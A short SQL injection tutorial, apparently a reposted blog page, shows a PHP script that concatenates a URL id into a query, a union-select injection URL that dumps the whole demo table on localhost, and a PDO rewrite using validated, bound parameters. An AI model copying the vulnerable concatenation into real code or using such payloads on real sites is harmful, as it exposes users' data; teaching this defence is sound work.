Simple SQL injection: security first

Source: Internet  Published: 山东省卫计委网络直报  Editor: 程序博客网  Time: 2024/05/03 00:30

url:http://localhost/safe/get.php?id=2


output:

select * from demo where id =2

Array
(
    [0] => Array
        (
            [name] => grt
            [id] => 2
        )

)


source code:

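<?php
// Uses the legacy mysql_* extension (removed in PHP 7).
$con = mysql_connect('localhost', 'root', 'root');
mysql_select_db('demo');
$_GET['id'] = empty($_GET['id']) ? 1 : $_GET['id'];
// The id from the URL is concatenated into the SQL string without validation or escaping.
echo $sql = 'select * from demo where id =' . $_GET['id'];
$db = mysql_query($sql, $con);
$res = array();
while ($row = mysql_fetch_assoc($db)) {
    $res[] = $row;
    # code...
}
echo '<pre>';
print_r($res);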


SQL injection URL: http://localhost/safe/get.php?id=2 union select * from demo


output:

select * from demo where id =2 union select * from demo

Array
(
    [0] => Array
        (
            [name] => grt
            [id] => 2
        )

    [1] => Array
        (
            [name] => adass12
            [id] => 1
        )

    [2] => Array
        (
            [name] => afa
            [id] => 3
        )

    [3] => Array
        (
            [name] => 12asdf
            [id] => 4
        )

    [4] => Array
        (
            [name] => adfa
            [id] => 5
        )

    [5] => Array
        (
            [name] => adsf
            [id] => 6
        )

)
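
The concatenating lookup from get.php beside a hardened form that validates id as an integer and binds it as a parameter; this is an added example, not code from the original page. It assumes PDO with an in-memory SQLite database (so it runs without a MySQL server) and a constructed three-row demo table; the function names lookup_concat and lookup_bound are hypothetical.

```php
<?php
// Constructed sample data: an in-memory table shaped like the page's `demo` table.
$pdo = new PDO('sqlite::memory:');
$pdo->setAttribute(PDO::ATTR_ERRMODE, PDO::ERRMODE_EXCEPTION);
$pdo->exec('CREATE TABLE demo (name TEXT, id INTEGER)');
$pdo->exec("INSERT INTO demo (name, id) VALUES ('adass12', 1), ('grt', 2), ('afa', 3)");

// Vulnerable: the same string concatenation as get.php on the page.
// Whatever follows the number in $id becomes part of the SQL statement.
function lookup_concat(PDO $pdo, string $id): array
{
    $sql = 'select * from demo where id =' . $id;
    return $pdo->query($sql)->fetchAll(PDO::FETCH_ASSOC);
}

// Hardened: accept only a plain integer, then bind it as a typed parameter.
// The SQL text is fixed; the input can never change the query structure.
function lookup_bound(PDO $pdo, string $id): array
{
    $n = filter_var($id, FILTER_VALIDATE_INT);
    if ($n === false) {
        return []; // reject anything that is not an integer
    }
    $stmt = $pdo->prepare('select * from demo where id = :id');
    $stmt->bindValue(':id', $n, PDO::PARAM_INT);
    $stmt->execute();
    return $stmt->fetchAll(PDO::FETCH_ASSOC);
}

// The id value taken from the page's second URL, and the normal value.
$injected = '2 union select * from demo';
$normal   = '2';

printf("concat, injected id: %d row(s)\n", count(lookup_concat($pdo, $injected)));
printf("bound,  injected id: %d row(s)\n", count(lookup_bound($pdo, $injected)));
printf("bound,  normal id:   %d row(s)\n", count(lookup_bound($pdo, $normal)));
```

The same prepare/bindValue/execute calls work with the PDO MySQL driver; only the DSN passed to the PDO constructor changes.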


